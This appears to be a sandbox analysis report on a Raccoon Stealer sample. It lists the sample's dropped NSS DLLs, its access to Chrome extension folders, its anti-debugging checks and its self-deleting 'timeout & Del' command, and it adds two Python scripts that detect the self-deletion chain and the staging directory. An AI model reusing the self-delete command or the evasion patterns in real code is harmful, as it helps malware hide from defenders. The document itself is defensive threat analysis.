Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004206DD
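The self-deletion above is the standard cmd.exe chain: a timeout so the parent can exit and release the lock on its own image, then del on the parent's path. A detection should key on that relationship, the deleted path being the parent's image, rather than on timeout or del alone, or every installer that cleans up a temp file will fire. The timeout.exe "Thread sleep count: 91 > 30" entry in the evasion section below is this same timeout /T 10 polling its countdown; it is a side effect of the deletion chain, not a separate evasion.

The block below is an added example, not sandbox output: it runs that rule over three constructed process-creation events. The Sysmon-style field names (Image, ParentImage, CommandLine) are an assumption; any telemetry with those three fields will do. The ping-based delay it also accepts is a common variant that this report does not show.

```python
"""Detection logic for the cmd.exe self-deletion chain shown above.

Added example, not sandbox code. Events are constructed; field names follow
Sysmon event ID 1 (assumed), the only three fields the rule needs.
"""
import re

# Delay commands seen in self-delete one-liners: timeout (this report) and
# ping to localhost (a common variant, assumed here, not in this report).
DELAY_RE = re.compile(r"\b(timeout\s+/t\s+\d+|ping\s+(?:-n\s+\d+\s+)?127\.0\.0\.1)", re.I)
# 'del [/switches] <path>' up to the next '&' or end of line; quotes optional,
# single or double, because the sandbox rendering above shows single quotes.
DEL_RE = re.compile(r"\bdel\s+((?:/\w+\s+)*)['\"]?([^'\"&\n]+?)['\"]?\s*(?:&|$)", re.I)

STEALER = r"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe"
# Constructed events: the chain from the report, an installer cleanup, a dir.
SAMPLE_EVENTS = [
    {"ParentImage": STEALER, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": "cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q '" + STEALER + "'"},
    {"ParentImage": r"C:\Program Files\Example\setup.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c del /q "C:\Users\user\AppData\Local\Temp\setup.log"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir C:\\"},
]

def norm_path(p: str) -> str:
    """Case-fold and unify separators so paths compare the way NTFS does."""
    return p.strip().lower().replace("/", "\\")

def extract_del_target(cmdline: str):
    """Path handed to 'del', without quotes, or None if there is no del."""
    m = DEL_RE.search(cmdline)
    return m.group(2).strip() if m else None

def classify(event: dict) -> list:
    """Tags for one process-creation event; empty list means no finding."""
    tags = []
    if not norm_path(event["Image"]).endswith("\\cmd.exe"):
        return tags
    cmd = event["CommandLine"]
    if DELAY_RE.search(cmd):
        tags.append("delayed-execution")
    target = extract_del_target(cmd)
    if target is None:
        return tags
    # The decisive check: cmd.exe deleting the very file that spawned it.
    if norm_path(target) == norm_path(event["ParentImage"]):
        tags.append("self-delete-via-cmd")
    else:
        tags.append("cmd-delete-other-file")
    return tags

def scan(events: list) -> list:
    """(index, tags) for every event that produced at least one tag."""
    results = []
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            results.append((i, tags))
    return results

if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS):
        print(i, tags, SAMPLE_EVENTS[i]["CommandLine"])
```

Only the first event earns self-delete-via-cmd; the installer cleanup is tagged cmd-delete-other-file so it can be triaged at lower priority instead of being silently dropped, and the dir command produces nothing.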

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe TID: 6232 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5684 Thread sleep count: 91 > 30
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll
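The drop set, listed in full under Persistence and Installation Behavior above, is the Mozilla NSS runtime (nss3, mozglue, freebl3, softokn3, nssdbm3, nssckbi), the VC++ redistributable (msvcp140, vcruntime140, ucrtbase and the api-ms-win-* forwarders) and a long tail of Thunderbird DLLs (MAPI, LDAP, accessibility marshalers) that came along with them. The "not started" list here is shorter than the drop list: nss3.dll, mozglue.dll, msvcp140.dll, vcruntime140.dll and ucrtbase.dll are absent from it, and mozglue.pdb shows up in a process memory dump among the PDB strings earlier, so the core NSS runtime was in fact loaded during the run and only the Thunderbird extras went unused. A random-named directory under AppData\LocalLow holding that runtime outside a Mozilla install is the host artifact to hunt for.

The script below is an added example, not sandbox code: find_nss_staging_dirs() walks a tree for directories that contain three or more of the marker DLLs outside Program Files, and build_sample_tree() creates a constructed fixture mirroring the paths above so the script runs offline. The marker threshold, the Program Files allow-list and the random-name heuristic are this example's assumptions.

```python
"""Hunt for the Raccoon NSS staging directory described above.

Added example, not sandbox code. The fixture is constructed in a temp dir;
on a real host pass a profile root such as C:\\Users as the first argument.
"""
import os
import re
import sys
import tempfile
from pathlib import Path

# Libraries the stealer dropped (from the list above). Three or more of them
# together in one directory outside Program Files is the hit condition.
MARKER_DLLS = {"nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll",
               "nssdbm3.dll", "sqlite3.dll", "msvcp140.dll", "vcruntime140.dll"}
MIN_MARKERS = 3                                   # assumed threshold
LEGIT_PARENTS = ("program files", "program files (x86)")
RANDOM_NAME_RE = re.compile(r"[A-Za-z0-9]{8,}")

def looks_random(name: str) -> bool:
    """Letter/digit soup like 'uS0wV5wY9qH3'; weak signal, used for ranking."""
    return (bool(RANDOM_NAME_RE.fullmatch(name))
            and any(c.isdigit() for c in name) and any(c.isalpha() for c in name))

def under_legit_install(path: Path) -> bool:
    """Firefox/Thunderbird ship the same DLLs under Program Files."""
    return any(part.lower() in LEGIT_PARENTS for part in path.parts)

def find_nss_staging_dirs(root) -> list:
    """Directories holding >= MIN_MARKERS marker DLLs outside an install."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        d = Path(dirpath)
        present = sorted(MARKER_DLLS & {f.lower() for f in filenames})
        if len(present) >= MIN_MARKERS and not under_legit_install(d):
            hits.append({"path": str(d), "markers": present,
                         "random_name": looks_random(d.name)})
    hits.sort(key=lambda h: (not h["random_name"], h["path"]))  # likeliest first
    return hits

def build_sample_tree() -> Path:
    """Constructed fixture mirroring the report's drop paths, in a temp dir."""
    root = Path(tempfile.mkdtemp(prefix="hunt_"))
    stage = root / "AppData" / "LocalLow" / "uS0wV5wY9qH3"
    stage.mkdir(parents=True)
    for n in ("nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll",
              "msvcp140.dll", "vcruntime140.dll"):
        (stage / n).write_bytes(b"MZ")
    # sqlite3.dll was dropped one level up, as in the report; alone it is no hit.
    (root / "AppData" / "LocalLow" / "sqlite3.dll").write_bytes(b"MZ")
    legit = root / "Program Files" / "Mozilla Thunderbird"   # must be excluded
    legit.mkdir(parents=True)
    for n in ("nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll"):
        (legit / n).write_bytes(b"MZ")
    return root

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for hit in find_nss_staging_dirs(root):
        print(hit["path"], hit["markers"], "random-name" if hit["random_name"] else "")
```

Once a hit is found, the parent process of the file-create events for that directory is the stealer, and its self-deletion (see the cmd.exe chain above) means the dropped runtime may be the only on-disk trace left of it.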
Is looking for software installed on the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_00437819
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 1_2_0043EFDD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045C559 IsDebuggerPresent,OutputDebugStringW, 1_2_0045C559
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 1_2_0042A2F9
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree, 1_2_00433882
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A03D mov eax, dword ptr fs:[00000030h] 1_2_0045A03D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A081 mov eax, dword ptr fs:[00000030h] 1_2_0045A081
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A0B2 mov eax, dword ptr fs:[00000030h] 1_2_0045A0B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00446C01 mov eax, dword ptr fs:[00000030h] 1_2_00446C01
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00446625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00446625
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00440B62 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00440B62
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00440CC5 SetUnhandledExceptionFilter, 1_2_00440CC5

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 1_2_0042C383
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_00437819
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 1_2_00462391
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: EnumSystemLocalesW, 1_2_00458577
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW, 1_2_0046258C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: EnumSystemLocalesW, 1_2_0046267E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: EnumSystemLocalesW, 1_2_00462633
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: EnumSystemLocalesW, 1_2_00462719
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 1_2_004627A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW, 1_2_004629F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_00462B1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW, 1_2_00458BA4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW, 1_2_00462C23
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 1_2_00462CF2
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00440985 cpuid 1_2_00440985
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0043E03E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 1_2_004371FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 1_2_0042A2F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 1_2_0042C383

Stealing of Sensitive Information:

Yara detected Raccoon Stealer
